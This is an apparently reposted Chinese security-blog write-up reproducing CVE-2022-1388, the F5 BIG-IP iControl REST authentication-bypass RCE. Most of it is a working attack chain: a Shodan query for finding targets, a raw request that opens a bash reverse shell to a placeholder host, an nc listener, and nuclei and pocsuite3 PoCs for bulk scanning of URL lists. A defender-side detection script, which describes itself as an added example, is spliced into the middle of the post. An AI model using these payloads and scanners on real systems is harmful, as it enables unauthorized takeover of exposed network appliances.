Vulnerability reproduction: CVE-2022-1388 F5 BIG-IP RCE

admin, 2022-05-19 01:58:06

0x01 Vulnerability description

F5 published a security advisory disclosing a remote code execution vulnerability in F5 BIG-IP (CVE-2022-1388). The flaw lies in the iControl REST component: an unauthenticated attacker can send requests that bypass iControl REST authentication on BIG-IP and then execute arbitrary system commands, create or delete files, or disable services on the target host.


0x02 Reproduction

Affected versions:

BIG-IP 16.x: 16.1.0 - 16.1.2

BIG-IP 15.x: 15.1.0 - 15.1.5

BIG-IP 14.x: 14.1.0 - 14.1.4

BIG-IP 13.x: 13.1.0 - 13.1.4

BIG-IP 12.x: 12.1.0 - 12.1.6

BIG-IP 11.x: 11.6.1 - 11.6.5

shodan:http.title:"BIG-IP®-+Redirect" +"Server"


1. Send the reverse-shell command

POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Content-Length: 85
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0a
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46xxxxx=

{"command":"run","utilCmdArgs":"-c 'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'"}



3. Listen with nc to receive the shell

nc -lnvp 7777



4. Use nuclei to check in bulk whether the URLs in 1.txt are vulnerable; the output shows that they are. (nuclei is stable and fast, PoCs are simple to write, and it is community-maintained; recommended.)

nuclei download: https://github.com/projectdiscovery/nuclei

Bulk verification command: nuclei -list 1.txt -t CVE-2022-1388.yaml

YAML PoC:

id: CVE-2022-1388

info:
  name: F5 BIG-IP iControl REST Auth Bypass RCE
  author: dwisiswant0
  severity: critical
  description: |
    This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.
  reference:
    - https://twitter.com/GossiTheDog/status/1523566937414193153
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.80
    cve-id: CVE-2022-1388
    cwe-id: CWE-306
  tags: cve

variables:
  auth: "admin:"

requests:
  - raw:
      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive, X-F5-Auth-Token
        X-F5-Auth-Token: a
        Authorization: Basic {{base64(auth)}}
        Content-Type: application/json

        { "command": "run", "utilCmdArgs": "-c 'echo ryaqkj'" }

    matchers:
      - type: word
        words:
          - "commandResult"
          - "ryaqkj"
        condition: and



5. Use pocsuite3 to check in bulk whether the URLs in 1.txt are vulnerable; the output shows one success and one failure.

pocsuite3 download: https://github.com/knownsec/pocsuite3, or reply "poc3" to the official account to download it

Usage: python3 cli.py -r pocs/CVE-2022-1388.py -f 1.txt
PoC:

# -*- coding:utf-8 -*-
from urllib.parse import urljoin

from pocsuite3.api import Output, POCBase, register_poc, requests


class DemoPOC(POCBase):
    vulID = "CVE-2022-1388"
    version = 'F5 BIG-IP 16.x: 16.1.0 - 16.1.2'
    author = ["ry"]
    vulDate = "2022-05-18"
    createDate = "2022-05-18"
    updateDate = "2022-05-18"
    references = ["https://support.f5.com/csp/article/K23605346"]
    name = "F5 BIG-IP RCE"
    appPowerLink = ''
    appName = 'F5 BIG-IP'
    appVersion = '''BIG-IP 16.x: 16.1.0 - 16.1.2
    BIG-IP 15.x: 15.1.0 - 15.1.5
    BIG-IP 14.x: 14.1.0 - 14.1.4
    BIG-IP 13.x: 13.1.0 - 13.1.4
    BIG-IP 12.x: 12.1.0 - 12.1.6
    BIG-IP 11.x: 11.6.1 - 11.6.5'''
    vulType = 'RCE'
    desc = ''' F5 BIG-IP RCE '''
    samples = []
    install_requires = ['']

    def _verify(self):
        result = {}
        path = "/mgmt/tm/util/bash"
        url = urljoin(self.url, path)
        # Harmless marker command; a vulnerable host echoes it back in commandResult
        payload = '{"command":"run","utilCmdArgs":"-c \'echo ryaqjk\'"}'
        # Content-Length is computed by requests from the body, so it is not set by hand
        headers = {
            'Connection': 'Keep-Alive, X-F5-Auth-Token',
            'Cache-Control': 'max-age=0a',
            'X-F5-Auth-Token': 'a',
            'Authorization': 'Basic YWRtaW46',  # base64 of "admin:"
        }
        try:
            rr = requests.post(url=url, headers=headers, data=payload, timeout=10, verify=False)
            # Both the marker and the commandResult key must appear in the response
            if "ryaqjk" in rr.text and "commandResult" in rr.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Name'] = payload
        except Exception:
            pass
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        return self._verify()


register_poc(DemoPOC)
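A defender-side check for the request pattern that the nuclei template and the pocsuite3 PoC above both send: an added example (not from the original post or from either tool) that parses a raw HTTP request and reports the CVE-2022-1388 indicators. The two sample requests, the host name bigip.example.test and the token value are constructed.

```python
import base64

# Constructed samples (not from the page): a bypass request like the one shown
# above, but with a harmless echo body, and a normal token-authenticated call.
EXPLOIT_REQUEST = (
    "POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: bigip.example.test\r\n"
    "Connection: Keep-Alive, X-F5-Auth-Token\r\nX-F5-Auth-Token: a\r\n"
    "Authorization: Basic YWRtaW46\r\nContent-Type: application/json\r\n\r\n"
    '{"command":"run","utilCmdArgs":"-c \'echo test\'"}'
)
BENIGN_REQUEST = (
    "GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: bigip.example.test\r\n"
    "Connection: keep-alive\r\nX-F5-Auth-Token: 7H3R4ND0MT0K3N\r\n\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def cve_2022_1388_indicators(raw):
    """Return the indicators found in an iControl REST request (empty = clean)."""
    method, path, headers, _ = parse_request(raw)
    if not path.startswith("/mgmt/"):
        return []
    found = []
    hop_by_hop = [t.strip().lower() for t in headers.get("connection", "").split(",")]
    # Core signature: the token header is named in Connection, so the front end
    # strips it as hop-by-hop, while the client still sends it.
    if "x-f5-auth-token" in hop_by_hop and "x-f5-auth-token" in headers:
        found.append("connection_drops_auth_token")
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:  # Basic auth naming admin on a request that drops its own token
            user = base64.b64decode(auth[6:]).decode(errors="replace").split(":", 1)[0]
            if user == "admin":
                found.append("basic_auth_as_admin")
        except ValueError:
            pass  # unparsable credentials: no extra indicator
    if method == "POST" and path == "/mgmt/tm/util/bash":
        found.append("util_bash_endpoint")
    return found
```

The Connection-header indicator is the one worth alerting on by itself; the other two only add context, since Basic auth and /mgmt/tm/util/bash are also used legitimately.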


(Note: only test sites you are formally authorized to test. Hack sites without authorization, and your loved ones will be the ones in tears.)


0x03 About the company

江西渝融云安全科技有限公司 (Jiangxi Yurongyun Security Technology Co., Ltd.), founded in 2017, has grown into a local high-tech company that combines cloud security, IoT security, data security, classified-protection (等保) construction, risk assessment, IT application innovation and cybersecurity talent training. It is a member enterprise of Jiangxi Province's information security industry chain and of the provincial government's emergency response teams for cybersecurity incidents in key sectors.
    The company holds multiple certifications, including Information Security Integration Level 3, Information System Security Operations and Maintenance Level 3 and Risk Assessment Level 3, and owns eighteen software copyrights; it won third prize in the 2020 national ICS security "In-Depth Tour" attack and defense competition and was recognized for an outstanding information security emergency support case during the CPC centenary celebrations, among other honors...

Written by: sm

Reviewed by: fjh

Reviewed by: Dog


Originally published on the WeChat official account 融云攻防实验室: Vulnerability reproduction: CVE-2022-1388 F5 BIG-IP RCE

Published by admin on 2022-05-19 01:58:06. Please keep this link when reposting (CN-SEC: thanks to the original author for their work): https://cn-sec.com/archives/1019233.html
